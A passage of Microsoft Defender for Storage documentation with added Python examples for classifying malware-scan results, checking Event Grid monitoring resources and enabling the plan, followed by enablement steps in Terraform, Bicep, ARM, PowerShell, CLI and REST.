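from typing import Dict, Optional, Tuple

# Blob index tag keys written by Malware Scanning (names from the page).
SCAN_RESULT_TAG = "Malware Scanning scan result"
SCAN_TIME_TAG = "Malware Scanning scan time UTC"

# Error code -> (follow-up action, billed?) per the page's error table.
# Billing for SAM259212 is not legible on the page, so it is left as None.
ERROR_ACTIONS: Dict[str, Tuple[str, Optional[bool]]] = {
    "SAM259201": ("retry", False),                        # transient internal error
    "SAM259203": ("restore-scanner-permissions", False),  # check the Activity Log
    "SAM259204": ("investigate", False),                  # blob deleted, moved or renamed
    "SAM259205": ("investigate", False),                  # ETag mismatch: altered after upload
    "SAM259206": ("unsupported", False),                  # larger than 2 GB
    "SAM259207": ("retry", False),                        # scan timed out (transient)
    "SAM259208": ("unsupported", False),                  # archive access tier
    "SAM259209": ("unsupported", False),                  # customer-provided keys
    "SAM259210": ("manual-review", True),                 # password-protected blob
    "SAM259211": ("quarantine", True),                    # nesting depth: evasion technique
    "SAM259212": ("manual-review", None),                 # corrupt blob
}


@dataclass
class Verdict:
    state: str                      # clean, malicious, error or unscanned
    action: str                     # what the pipeline should do with the blob
    code: Optional[str] = None      # SAM error code, if any
    billed: Optional[bool] = None   # whether the failed attempt is charged
    scanned_at: Optional[str] = None


def classify(tags: Dict[str, str]) -> Verdict:
    """Map one blob's index tags to a Verdict."""
    value = tags.get(SCAN_RESULT_TAG)
    when = tags.get(SCAN_TIME_TAG)
    if value is None:
        # No result tag: the blob was not scanned (over the throughput or size
        # limits, or a hierarchical-namespace account where tags are unsupported).
        return Verdict("unscanned", "hold")
    if value == "No threats found":
        return Verdict("clean", "release", scanned_at=when)
    if value == "Malicious":
        return Verdict("malicious", "quarantine", scanned_at=when)
    match = re.match(r"\s*(SAM\d{6})\b", value)
    code = match.group(1) if match else None
    if code in ERROR_ACTIONS:
        action, billed = ERROR_ACTIONS[code]
        return Verdict("error", action, code=code, billed=billed, scanned_at=when)
    # Unknown error string: do not release the blob unseen.
    return Verdict("error", "investigate", code=code, scanned_at=when)


def summarize(blobs: Dict[str, Dict[str, str]]) -> Dict[str, int]:
    """Count actions across a batch of {blob_name: index_tags}."""
    counts: Dict[str, int] = {}
    for tags in blobs.values():
        action = classify(tags).action
        counts[action] = counts.get(action, 0) + 1
    return counts


# Constructed sample tags (not real scanner output).
SAMPLE_BLOBS = {
    "invoice.pdf": {SCAN_RESULT_TAG: "No threats found",
                    SCAN_TIME_TAG: "2023-03-27T06:14:00Z"},
    "dropper.exe": {SCAN_RESULT_TAG: "Malicious",
                    SCAN_TIME_TAG: "2023-03-27T06:15:00Z"},
    "nested.zip": {SCAN_RESULT_TAG:
                   "SAM259211: Scan aborted - maximum archive nesting depth exceeded."},
    "big.iso": {SCAN_RESULT_TAG: "SAM259206: Scan aborted - the requested blob "
                                 "exceeded the maximum allowed size of 2 GB."},
    "flaky.bin": {SCAN_RESULT_TAG: "SAM259201: Scan failed - internal service error."},
    "untagged.txt": {},
}

if __name__ == "__main__":
    for name, tags in SAMPLE_BLOBS.items():
        print(f"{name}: {classify(tags)}")
    print(summarize(SAMPLE_BLOBS))
```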


Next steps 


• Learn about advanced configurations for malware scanning. 
List of security threats and security alerts 

Data security becomes a top priority as organizations shift data to cloud storage 
solutions like Azure Storage. This document outlines common security threats and risks 
associated with misconfigured settings and the security alerts Microsoft Defender for 
Storage provides to detect and respond to potential security threats. 


Security threats in cloud-based storage services 


Azure Storage is a widely used cloud storage solution, and like any cloud-based service, 
it is susceptible to various security threats. Common security threats in Azure Storage 
include: 


• Access token abuse and leakage 

• Lateral movement from compromised workloads 

• Compromised third-party partners with privileged permissions 

• Credentials theft 

• Reconnaissance with search engines 

• Data collection by blob hunting 

• Insider threats with existing permissions 


These threats can result in malware uploads, data corruption, and sensitive data 
exfiltration, posing significant risks. 


[Figure: the threats listed above (access token leakage and abuse, lateral movement from compromised workloads, insider threats with existing permissions, compromised third-party partners, credentials theft, reconnaissance with search engines, collection by blob hunting) arranged around a storage account] 


In addition to security threats, configuration errors may inadvertently expose sensitive 
resources. Some common misconfiguration issues include: 


• Inadequate access controls and networking rules, leading to unintended data 
exposure on the internet 

• Insufficient authentication mechanisms 

• Lack of data encryption protocols for both data in transit and at rest 


To minimize the risk of security breaches and configuration errors, security teams 
employ a combination of posture management tools and workload protection tools. 
These tools ensure that Azure Storage remains secure by providing visibility into early 
signs of breaches, helping prevent attacks, and maintaining secure configurations. 


Microsoft security researchers have analyzed the attack surface of storage services. The 
potential security risks are described in the threat matrix for cloud-based storage 
services, which is based on the MITRE ATT&CK® framework, a knowledge base for 
the tactics and techniques employed in cyber-attacks. 


What kind of security alerts does Microsoft Defender for Storage provide? 


Tip 


For a comprehensive list of all Defender for Storage alerts, see the alerts reference 
guide page. This is useful for workload owners who want to know what threats can 
be detected and help SOC teams gain familiarity with detections before 
investigating them. Learn more about Defender for Cloud security alerts and how 
to respond to them. 


Security alerts are triggered in the following scenarios: 


Scenario: Description 

Malicious content upload: Malware Scanning scans every blob uploaded to your storage 
accounts. It detects ransomware, viruses, spyware, and other malware uploaded to the 
storage account, helping you prevent it from entering the organization and spreading. 
The classic malware hash analysis alert operates differently from Malware Scanning. It 
compares the uploaded blob/file hash with a list of known malicious hash signatures 
rather than analyzing the file contents for malware. 

Sensitive data exposure event: Detection of access level change allowing 
unauthenticated public access to blob containers with sensitive data from the internet 

Suspicious activities on resources with sensitive data: Detection of suspicious activities 
occurring on blob containers containing sensitive data 

Compromised, misconfigured and unusual authentication tokens: Detection of 
compromised SAS tokens used for data plane authentication and operations, and 
detection of unusual SAS tokens that can be generated by a malicious actor 

Data and permissions inspection: Detection of unusual exploration of the data and 
inspection of access permissions 

Data exfiltration: Detection of unusual extraction of data from storage accounts 

Data deletion: Detection of unusual deletions in storage accounts 

Blob-hunting attempts: Detection of collection attempts by scanning and enumerating 
resources for publicly exposed storage resources. Read more on how to detect, 
investigate and prevent blob-hunting. 

Unusual access patterns: Detection of unusual access to storage accounts from unusual 
locations, applications, and with unusual authentication 

Suspicious access signatures: Detection of known suspicious IP addresses by Microsoft 
Threat Intelligence, known Tor exit nodes, and known suspicious applications 

Phishing campaigns: Detection of phishing content hosted on storage accounts and 
identified as part of a phishing attack impacting Microsoft 365 users 


Security alerts include details of the suspicious activity, relevant investigation steps, 
remediation actions, and security recommendations. Alerts can be exported to Microsoft 
Sentinel or any other third-party SIEM/XDR tool. Learn more about how to stream alerts 
to a SIEM, SOAR, or IT Service Management solution. 


Understanding the differences between Malware Scanning and hash reputation analysis 


Defender for Storage offers two capabilities to detect malicious content uploaded to 
storage accounts: Malware Scanning (paid add-on feature available only on the new 
plan) and hash reputation analysis (available in all plans). 


Malware Scanning (paid add-on feature available only on the new plan) 


Malware Scanning leverages Microsoft Defender Antivirus (MDAV) to scan blobs 
uploaded to Blob storage, providing a comprehensive analysis that includes deep file 
scans and hash reputation analysis. This feature provides an enhanced level of detection 
against potential threats. 


Hash reputation analysis (available in all plans) 


Hash reputation analysis detects potential malware in Blob storage and Azure Files by 
comparing the hash values of newly uploaded blobs/files against those of known 
malware by Microsoft Threat Intelligence. Not all file protocols and operation types 
are supported with this capability, leading to some operations not being monitored for 
potential malware uploads. Unsupported use cases include SMB file shares and when a 
blob is created using Put Block and Put Block List. 


In summary, Malware Scanning, which is only available on the new plan for Blob storage, 
offers a more comprehensive approach to malware detection by analyzing the full 
content of files and incorporating hash reputation analysis in its scanning methodology. 


Next steps 


In this article, you learned about Microsoft Defender for Storage. 


Enable Defender for Storage 


Common questions about Defender for Storage 


FAQ 


Get answers to common questions about Microsoft Defender for Storage. 


Is it possible to enable Defender for Storage on a resource level? 


Yes, it's possible to enable Defender for Storage at the resource level and set up 
Malware Scanning and Sensitivity Scanning accordingly. Keep in mind that enabling it at 
the subscription level is the recommended approach, as it will automatically protect all 
new storage accounts. 

Can I exclude certain storage accounts from protection? 


Yes, you can exclude storage accounts from protection. 


How long does it take for subscription-level enablement to take effect? 

Enabling Defender for Storage at the subscription level may take up to 24 hours to be 
fully enabled across all storage accounts. 

Is there a difference in features between the new and Defender for Storage (classic)? 


Yes, there's a difference in the capabilities of the two plans. New and future security 
capabilities will only be available in the new Defender for Storage plan. If you want to 
access these new capabilities, you need to enable the new plan. 


Will the Defender for Storage (classic) continue to be supported? 


Defender for Storage (classic) will continue to be supported for three years after 
the release of the new Defender for Storage to general availability (GA). 


Can I switch back to the Defender for Storage (classic)? 


Yes, you can use the REST API to return to the Defender for Storage (classic) plan. 


If you want to switch back to the Defender for Storage (classic) plan, you need to do two 
things. First, disable the new Defender for Storage plan that is enabled now. Second, 
check if there are any policies that can re-enable the new plan and turn them off too. 
The two Azure built-in policies enabling the new plan are Configure Microsoft Defender 
for Storage to be enabled and Configure basic Microsoft Defender for Storage to be 
enabled (Activity Monitoring only). 


How can I calculate the cost of each plan? 


To estimate the cost of Defender for Storage, we've provided a pricing estimation 
workbook and a PowerShell script that you can run in your environment. You can also 
check out the Defender for Cloud pricing page for more information. 


How does Defender for Storage monitor storage accounts? 


Defender for Storage uses Azure Event Grid to monitor the storage account activity. This 
results in the creation of an Azure Event Grid System topic with the name 
<StorageAccountName>-<Guid> in the same resource group as the storage account. It 
will also create an Event Grid Subscription resource named 
StorageAntimalwareSubscription. 
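A check derived from the answer above, added here as an example and not Microsoft's code: given an inventory of storage accounts, Event Grid system topics and event subscriptions, it reports accounts whose monitoring resources are missing. The inventory shape (lists of dicts) and the GUID values are constructed assumptions for the example.

```python
"""Verify the Event Grid resources Defender for Storage creates for each account.

Added example, not Microsoft's code. Per the answer above, enabling the plan
creates a system topic named <StorageAccountName>-<Guid> in the account's
resource group and an event subscription named StorageAntimalwareSubscription.
The inventory shape (lists of dicts) is an assumption; feed it from your own
resource listing.
"""
import re
from typing import Dict, List, Set

SUBSCRIPTION_NAME = "StorageAntimalwareSubscription"
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"


def topic_pattern(storage_account: str) -> "re.Pattern[str]":
    """Regex matching the system topic name Defender for Storage uses for one account."""
    return re.compile(rf"^{re.escape(storage_account)}-{GUID}$", re.IGNORECASE)


def monitoring_gaps(accounts: List[Dict[str, str]],
                    topics: List[Dict[str, str]],
                    subscriptions: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {account: [problems]} for accounts whose monitoring wiring is incomplete.

    accounts:      [{"name": ..., "resourceGroup": ...}]
    topics:        [{"name": ..., "resourceGroup": ...}]   Event Grid system topics
    subscriptions: [{"name": ..., "topic": ...}]           event subscriptions per topic
    """
    subs_by_topic: Dict[str, Set[str]] = {}
    for sub in subscriptions:
        subs_by_topic.setdefault(sub["topic"], set()).add(sub["name"])

    gaps: Dict[str, List[str]] = {}
    for acct in accounts:
        pattern = topic_pattern(acct["name"])
        # Only topics in the same resource group count, as the FAQ describes.
        matching = [t for t in topics
                    if t["resourceGroup"].lower() == acct["resourceGroup"].lower()
                    and pattern.match(t["name"])]
        problems: List[str] = []
        if not matching:
            problems.append("no system topic named <account>-<guid> in the resource group")
        elif not any(SUBSCRIPTION_NAME in subs_by_topic.get(t["name"], set())
                     for t in matching):
            problems.append(f"system topic has no event subscription named {SUBSCRIPTION_NAME}")
        if problems:
            gaps[acct["name"]] = problems
    return gaps


# Constructed inventory; the GUIDs are made up for the example.
ACCOUNTS = [
    {"name": "stprotected", "resourceGroup": "rg-data"},
    {"name": "stnotopic", "resourceGroup": "rg-data"},
    {"name": "stnosub", "resourceGroup": "rg-data"},
]
TOPICS = [
    {"name": "stprotected-1b2c3d4e-5f60-4a7b-8c9d-0e1f2a3b4c5d", "resourceGroup": "rg-data"},
    {"name": "stnosub-9a8b7c6d-5e4f-4321-9876-543210fedcba", "resourceGroup": "rg-data"},
    # Right name, wrong resource group: must not satisfy stnotopic.
    {"name": "stnotopic-11111111-2222-3333-4444-555555555555", "resourceGroup": "rg-other"},
]
SUBSCRIPTIONS = [
    {"name": SUBSCRIPTION_NAME, "topic": "stprotected-1b2c3d4e-5f60-4a7b-8c9d-0e1f2a3b4c5d"},
]

if __name__ == "__main__":
    for account, problems in monitoring_gaps(ACCOUNTS, TOPICS, SUBSCRIPTIONS).items():
        print(account, "->", "; ".join(problems))
```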


Next steps 


Learn more about Defender for Storage 


Overview of Microsoft Defender for Storage (classic) 

Note 


Upgrade to the new Microsoft Defender for Storage plan. It includes new features 
like Malware Scanning and Sensitive Data Threat Detection. This plan also provides 
a more predictable pricing structure for better control over coverage and costs. 
Additionally, all new Defender for Storage features will only be released in the new 
plan. Migrating to the new plan is a simple process; read here about how to 
migrate from the classic plan. If you're using Defender for Storage (classic) with 
per-transaction or per-storage account pricing, you'll need to migrate to the new 
Defender for Storage plan to access these features and pricing. Learn about 
the benefits of migrating to the new Defender for Storage plan. 


Microsoft Defender for Storage (classic) is an Azure-native layer of security intelligence 
that detects unusual and potentially harmful attempts to access or exploit your storage 
accounts. It uses advanced threat detection capabilities and Microsoft Threat 
Intelligence data to provide contextual security alerts. Those alerts also include steps 
to mitigate the detected threats and prevent future attacks. 


You can enable Microsoft Defender for Storage (classic) at either the subscription level 
(recommended) or the resource level. 


Defender for Storage (classic) continually analyzes the data stream generated by the 
Azure Blob Storage, Azure Files, and Azure Data Lake Storage services. When 
potentially malicious activities are detected, security alerts are generated. These alerts 
are displayed in Microsoft Defender for Cloud. Any details of suspicious activity along 
with the relevant investigation steps, remediation actions, and security 
recommendations are presented here. 


Analyzed data of Azure Blob Storage includes operation types such as Get Blob, Put 
Blob, Get Container ACL, List Blobs, and Get Blob Properties. Examples of analyzed 
Azure Files operation types include Get File, Create File, List Files, Get File 
Properties, and Put Range. 


Defender for Storage (classic) doesn't access the Storage account data and has no effect 
on its performance. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: 


• Defender for Storage (classic) in the field 


For more clarification about Defender for Storage (classic), see the commonly asked 
questions. 


Availability 


Aspect: Details 

Release state: General availability (GA) 

Pricing: Microsoft Defender for Storage (classic) is billed as shown on the pricing 
page 

Protected storage types: Blob Storage (Standard/Premium StorageV2, Block Blobs); 
Azure Files (over REST API and SMB); Azure Data Lake Storage Gen2 (Standard/Premium 
accounts with hierarchical namespaces enabled) 

Clouds: Commercial clouds (supported); Azure Government (supported); Microsoft Azure 
operated by 21Vianet (not supported); Connected AWS accounts (not supported) 


What are the benefits of Microsoft Defender for Storage (classic)? 


Defender for Storage (classic) provides: 


• Azure-native security - With 1-click enablement, Defender for Storage (classic) 
protects data stored in Azure Blob, Azure Files, and Data Lakes. As an Azure-native 
service, Defender for Storage (classic) provides centralized security across all data 
assets that Azure manages and is integrated with other Azure security services 
such as Microsoft Sentinel. 


• Rich detection suite - Powered by Microsoft Threat Intelligence, the detections in 
Defender for Storage (classic) cover the top storage threats such as 
unauthenticated access, compromised credentials, social engineering attacks, data 
exfiltration, privilege abuse, and malicious content. 


• Response at scale - Defender for Cloud's automation tools make it easier to 
prevent and respond to identified threats. Learn more in Automate responses to 
Defender for Cloud triggers. 


Security threats in cloud-based storage services 


Microsoft security researchers have analyzed the attack surface of storage services. 
Storage accounts can be subject to data corruption, exposure of sensitive content, 
malicious content distribution, data exfiltration, unauthorized access, and more. 


The potential security risks are described in the threat matrix for cloud-based storage 
services and are based on the MITRE ATT&CK® framework, a knowledge base for 
the tactics and techniques employed in cyberattacks. 


What kind of alerts does Microsoft Defender for Storage (classic) provide? 


Security alerts are triggered for the following scenarios (typically from 1-2 hours after 
the event): 


Type of threat: Description 


Unusual access to an account: For example, access from a TOR exit node, suspicious IP 
addresses, unusual applications, unusual locations, and anonymous access without 
authentication. 


Unusual behavior in an account: Behavior that deviates from a learned baseline. For 
example, a change of access permissions in an account, unusual access inspection, 
unusual data exploration, unusual deletion of blobs/files, or unusual data extraction. 


Hash reputation based Malware detection: Detection of known malware based on full 
blob/file hash, which can help detect ransomware, viruses, spyware, and other malware 
uploaded to an account, prevent it from entering the organization, and spreading to 
more users and resources. See also Limitations of hash reputation analysis. 


Unusual file uploads: Unusual cloud service packages and executable files that have 
been uploaded to an account. 


Public visibility: Potential break-in attempts by scanning containers and pulling 
potentially sensitive data from publicly accessible containers. 


Phishing campaigns: When content that's hosted on Azure Storage is identified as part 
of a phishing attack that's impacting Microsoft 365 users. 


Tip 


For a comprehensive list of all Defender for Storage (classic) alerts, see the alerts 
reference page. It is essential to review the prerequisites, as certain security alerts 
are only accessible under the new Defender for Storage plan. The information in 
the reference page is beneficial for workload owners seeking to understand 
detectable threats and enables Security Operations Center (SOC) teams to 
familiarize themselves with detections prior to conducting investigations. Learn 
more about what's in a Defender for Cloud security alert, and how to manage your 
alerts in Manage and respond to security alerts in Microsoft Defender for Cloud. 


Alerts include details of the incident that triggered them, and recommendations on how 
to investigate and remediate threats. Alerts can be exported to Microsoft Sentinel or any 
other third-party SIEM or any other external tool. Learn more in Stream alerts to a SIEM, 
SOAR, or IT classic deployment model solution. 


Limitations of hash reputation analysis 


Tip 


If you're looking to have your uploaded blobs scanned for malware in near real- 
time, we recommend that you upgrade to the new Defender for Storage plan. Learn 
more about Malware Scanning. 


• Hash reputation isn't deep file inspection - Microsoft Defender for Storage 
(classic) uses hash reputation analysis supported by Microsoft Threat Intelligence 
to determine whether an uploaded file is suspicious. The threat protection tools 
don't scan the uploaded files; rather they analyze the data generated from the 
Blob Storage and Files services. Defender for Storage (classic) then compares the 
hashes of newly uploaded files with hashes of known viruses, trojans, spyware, and 
ransomware. 


• Hash reputation analysis isn't supported for all file protocols and operation 
types - Some, but not all, of the data logs contain the hash value of the related 
blob or file. In some cases, the data doesn't contain a hash value. As a result, some 
operations can't be monitored for known malware uploads. Examples of such 
unsupported use cases include SMB file shares and when a blob is created using 
Put Block and Put Block List. 


Next steps 
In this article, you learned about Microsoft Defender for Storage (classic). 


• Enable Defender for Storage (classic) 
• Check out common questions about Defender for Storage classic. 


Enable Microsoft Defender for Storage (classic) 

This article explains how you can enable and configure Microsoft Defender for Storage 
(classic) on your subscriptions by using various templates such as PowerShell, REST API, 
and others. 


You can also upgrade to the new Microsoft Defender for Storage plan and use advanced 
security capabilities, including Malware Scanning and sensitive data threat detection. 
Benefit from a more predictable and granular pricing structure that charges per storage 
account, with extra costs for high-volume transactions. This new pricing plan also 
encompasses all new security features and detections. 


Note 


If you're using Defender for Storage (classic) with per-transaction or per-storage 
account pricing, you'll need to migrate to the new Defender for Storage plan to 
access these features and pricing. Learn about migrating to the new Defender for 
Storage plan. 


Microsoft Defender for Storage is an Azure-native layer of security intelligence that 
detects unusual and potentially harmful attempts to access or exploit your storage 
accounts. It uses advanced threat detection capabilities and Microsoft Threat 
Intelligence data to provide contextual security alerts. Those alerts also include steps 
to mitigate the detected threats and prevent future attacks. 


Microsoft Defender for Storage continuously analyzes the transactions of Azure Blob 
Storage, Azure Data Lake Storage, and Azure Files services. When potentially 
malicious activities are detected, security alerts are generated. Alerts are shown in 
Microsoft Defender for Cloud with the details of the suspicious activity, appropriate 
investigation steps, remediation actions, and security recommendations. 


Analyzed telemetry of Azure Blob Storage includes operation types such as Get Blob, Put 
Blob, Get Container ACL, List Blobs, and Get Blob Properties. Examples of analyzed Azure 
Files operation types include Get File, Create File, List Files, Get File Properties, and Put 
Range. 


Defender for Storage classic doesn’t access the Storage account data and has no impact 
on its performance. 


Learn more about the benefits, features, and limitations of Defender for Storage. You 
can also learn more about Defender for Storage in the Defender for Storage episode of 
the Defender for Cloud in the Field video series. 


Availability 


Aspect: Details 

Release state: General availability (GA) 

Pricing: Microsoft Defender for Storage is billed as shown in the pricing details 
and in the Defender plans in the Azure portal 

Protected storage types: Blob Storage (Standard/Premium StorageV2, Block Blobs); 
Azure Files (over REST API and SMB); Azure Data Lake Storage Gen2 (Standard/Premium 
accounts with hierarchical namespaces enabled) 

Clouds: Commercial clouds (supported); Azure Government (supported, only for the 
per-transaction plan); Microsoft Azure operated by 21Vianet (not supported); Connected 
AWS accounts (not supported) 


Set up Microsoft Defender for Storage (classic) 


Set up per-transaction pricing for a subscription 


For the Defender for Storage per-transaction pricing, we recommend that you enable 
Defender for Storage for each subscription so that all existing and new storage accounts 
are protected. If you want to only protect specific accounts, configure Defender for 
Storage for each account. 


You can configure Microsoft Defender for Storage on your subscriptions in several ways: 


• Terraform template 

• Bicep template 

• ARM template 

• PowerShell 

• Azure CLI 

• REST API 


Terraform template 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using a Terraform template, add this code snippet to your template with your 
subscription ID as the parent_id value: 


Terraform 


resource "azapi_resource" "symbolicname" { 
  type      = "Microsoft.Security/pricings@2022-03-01" 
  name      = "StorageAccounts" 
  parent_id = "<subscriptionId>" 
  body = jsonencode({ 
    properties = { 
      pricingTier = "Standard" 
      subPlan     = "PerTransaction" 
    } 
  }) 
} 


To disable the plan, set the pricingTier property value to Free and remove the subPlan 
property. 


Learn more about the ARM template AzAPI reference. 


Bicep template 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using Bicep, add the following to your Bicep template: 


Bicep 


resource symbolicname 'Microsoft.Security/pricings@2022-03-01' = { 
  name: 'StorageAccounts' 
  properties: { 
    pricingTier: 'Standard' 
    subPlan: 'PerTransaction' 
  } 
} 

To disable the plan, set the pricingTier property value to Free and remove the subPlan 
property. 


Learn more about the Bicep template AzAPI reference. 


ARM template 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using an ARM template, add this JSON snippet to the resources section of your 
ARM template: 


JSON 
{ 
"type": "Microsoft.Security/pricings", 
"apiVersion": "2022-03-01", 
"name": "StorageAccounts", 
"properties": { 
"pricingTier": "Standard", 
"subPlan": "PerTransaction" 
} 
} 


To disable the plan, set the pricingTier property value to Free and remove the subPlan 
property. 


Learn more about the ARM template AzAPI reference. 


PowerShell 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using PowerShell: 


1. If you don't have it already, install the Azure Az PowerShell module. 


2. Use the Connect-AzAccount cmdlet to sign in to your Azure account. Learn more 
about signing in to Azure with Azure PowerShell. 


3. Use these commands to register your subscription to the Microsoft Defender for 
Cloud Resource Provider: 


PowerShell 


Set-AzContext -Subscription <subscriptionId> 
Register-AzResourceProvider -ProviderNamespace 'Microsoft.Security ' 


Replace <subscriptionId> with your subscription ID. 


4. Enable Microsoft Defender for Storage for your subscription with the Set- 


AzSecurityPricing cmdlet: 


PowerShell 


Set-AzSecurityPricing -Name "StorageAccounts" -PricingTier "Standard" 


Ọ Tip 
You can use the GetAzSecurityPricing (Az_Security) to see all of the Defender for 
Cloud plans that are enabled for the subscription. 

To disable the plan, set the -PricingTier property value to Free. 


Learn more about the using PowerShell with Microsoft Defender for Cloud. 


Azure CLI 


To enable Microsoft Defender for Storage at the subscription level with per-transaction
pricing using Azure CLI:

1. If you don't have it already, install the Azure CLI.

2. Use the az login command to sign in to your Azure account. Learn more about
   signing in to Azure with Azure CLI.

3. Use this command to select the subscription by ID or name:

   Azure CLI

   az account set --subscription "<subscriptionId or name>"

   Replace <subscriptionId or name> with your subscription ID or name.

4. Enable Microsoft Defender for Storage for your subscription with the az security
   pricing create command:

   Azure CLI

   az security pricing create -n StorageAccounts --tier "standard"

Tip

You can use the az security pricing show command to see all of the Defender for
Cloud plans that are enabled for the subscription.

To disable the plan, set the --tier parameter value to free.

Learn more about the az security pricing create command.


REST API 


To enable Microsoft Defender for Storage at the subscription level with per-transaction
pricing using the Microsoft Defender for Cloud REST API, create a PUT request with this
endpoint and body:

HTTP

PUT https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.Security/pricings/StorageAccounts?api-version=2022-03-01

{
  "properties": {
    "pricingTier": "Standard",
    "subPlan": "PerTransaction"
  }
}

Replace {subscriptionId} with your subscription ID.

To disable the plan, set the pricingTier property value to Free and remove the
subPlan property.

Learn more about updating Defender plans with the REST API in HTTP, Java, Go and
JavaScript.
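The following is an added example, not Microsoft's own code, of driving the pricings REST endpoint described above from a script. It builds the PUT request and body shown on this page, refuses to trust the call until ARM echoes back the requested state, and classifies the returned resource into "disabled", "classic (per-transaction)" or "classic (per-storage account)". The transport is injected as a callable so the logic runs offline against an in-memory stand-in; `arm_send` is a real standard-library transport for use with a valid bearer token. The `PerStorageAccount` subPlan value is the classic per-storage account plan; the `DefenderForStorageV2` value is assumed here to be the subPlan used by the new plan and is not on this page.

```python
"""Enable, disable and classify the Defender for Storage plan via Microsoft.Security/pricings.

Added example (not Microsoft's code). Follows the PUT request on this page:
  PUT .../providers/Microsoft.Security/pricings/StorageAccounts?api-version=2022-03-01
  body {"properties": {"pricingTier": ..., "subPlan": ...}}
"""
import json
import urllib.error
import urllib.request

API_VERSION = "2022-03-01"
PLAN_NAME = "StorageAccounts"
CLASSIC_PER_TRANSACTION = "PerTransaction"
CLASSIC_PER_STORAGE_ACCOUNT = "PerStorageAccount"
NEW_PLAN = "DefenderForStorageV2"  # assumption: subPlan used by the new plan


def pricing_url(subscription_id: str) -> str:
    return (f"https://management.azure.com/subscriptions/{subscription_id}"
            f"/providers/Microsoft.Security/pricings/{PLAN_NAME}?api-version={API_VERSION}")


def pricing_body(enable: bool, sub_plan: str = CLASSIC_PER_TRANSACTION) -> dict:
    """Disabling means pricingTier=Free with the subPlan property removed, as the page says."""
    if not enable:
        return {"properties": {"pricingTier": "Free"}}
    return {"properties": {"pricingTier": "Standard", "subPlan": sub_plan}}


def classify(pricing: dict) -> str:
    """Map a pricings resource (as returned by GET or PUT) to a readable plan state."""
    props = pricing.get("properties") or {}
    tier, sub = props.get("pricingTier"), props.get("subPlan")
    if tier == "Free":
        return "disabled"
    if tier != "Standard":
        return f"unknown pricingTier {tier!r}"
    return {
        CLASSIC_PER_TRANSACTION: "classic (per-transaction)",
        CLASSIC_PER_STORAGE_ACCOUNT: "classic (per-storage account)",
        NEW_PLAN: "new Defender for Storage plan",
    }.get(sub, f"enabled with unrecognised subPlan {sub!r}")


def set_storage_plan(subscription_id: str, enable: bool, send, token: str) -> str:
    """PUT the desired state, then verify ARM echoed it back before reporting success."""
    body = pricing_body(enable)
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    status, text = send("PUT", pricing_url(subscription_id), headers, json.dumps(body))
    if status not in (200, 201):
        raise RuntimeError(f"pricings PUT failed with HTTP {status}: {text}")
    resource = json.loads(text)
    got = resource.get("properties") or {}
    want = body["properties"]
    if got.get("pricingTier") != want["pricingTier"] or got.get("subPlan") != want.get("subPlan"):
        raise RuntimeError(f"ARM returned a different state than requested: {got}")
    return classify(resource)


def arm_send(method, url, headers, body):
    """Real transport (standard library only); not exercised by the offline demo."""
    req = urllib.request.Request(url, data=body.encode(), headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def fake_arm(state: dict):
    """Constructed in-memory stand-in for ARM: stores the last PUT body and echoes it back."""
    def send(method, url, headers, body):
        if not headers.get("Authorization", "").startswith("Bearer "):
            return 401, json.dumps({"error": {"code": "AuthenticationFailed"}})
        if method == "PUT":
            state["properties"] = json.loads(body)["properties"]
        current = state.get("properties", {"pricingTier": "Free"})
        return 200, json.dumps({"name": PLAN_NAME, "properties": current})
    return send


if __name__ == "__main__":
    demo_state = {}
    send = fake_arm(demo_state)
    sub = "00000000-0000-0000-0000-000000000000"  # placeholder subscription ID
    print(set_storage_plan(sub, True, send, "<token>"))   # classic (per-transaction)
    print(set_storage_plan(sub, False, send, "<token>"))  # disabled
```

To run it against a real subscription, pass `arm_send` instead of the fake and a bearer token for `https://management.azure.com/`; the echo check matters because a PUT that is accepted but silently normalised (for example a subPlan dropped) would otherwise look like success.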


Set up per-transaction pricing for a storage account 


You can configure Microsoft Defender for Storage with per-transaction pricing on your
accounts in several ways:

• ARM template
• PowerShell
• Azure CLI

ARM template

To enable Microsoft Defender for Storage for a specific storage account with
per-transaction pricing using an ARM template, use the prepared Azure template.

If you want to disable Defender for Storage on the account:

1. Sign in to the Azure portal.

2. Navigate to your storage account.

3. In the Security + networking section of the Storage account menu, select
   Microsoft Defender for Cloud.

4. Select Disable.

PowerShell 


To enable Microsoft Defender for Storage for a specific storage account with
per-transaction pricing using PowerShell:

1. If you don't have it already, install the Azure Az PowerShell module.

2. Use the Connect-AzAccount cmdlet to sign in to your Azure account. Learn more
   about signing in to Azure with Azure PowerShell.

3. Enable Microsoft Defender for Storage for the desired storage account with
   the Enable-AzSecurityAdvancedThreatProtection cmdlet:

   PowerShell

   Enable-AzSecurityAdvancedThreatProtection -ResourceId "/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.Storage/storageAccounts/<storage-account>"

   Replace <subscription-id>, <resource-group>, and <storage-account> with the
   values for your environment.

If you want to disable per-transaction pricing for a specific storage account, use the
Disable-AzSecurityAdvancedThreatProtection cmdlet:

PowerShell

Disable-AzSecurityAdvancedThreatProtection -ResourceId "/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.Storage/storageAccounts/<storage-account>"

Learn more about using PowerShell with Microsoft Defender for Cloud.


Azure CLI 


To enable Microsoft Defender for Storage for a specific storage account with
per-transaction pricing using Azure CLI:

1. If you don't have it already, install the Azure CLI.

2. Use the az login command to sign in to your Azure account. Learn more about
   signing in to Azure with Azure CLI.

3. Enable Microsoft Defender for Storage for the storage account with the az security
   atp storage update command:

   Azure CLI

   az security atp storage update \
     --resource-group <resource-group> \
     --storage-account <storage-account> \
     --is-enabled true

Tip

You can use the az security atp storage show command to see if Defender for
Storage is enabled on an account.

To disable Microsoft Defender for Storage for the storage account, use the az security atp
storage update command:

Azure CLI

az security atp storage update \
  --resource-group <resource-group> \
  --storage-account <storage-account> \
  --is-enabled false

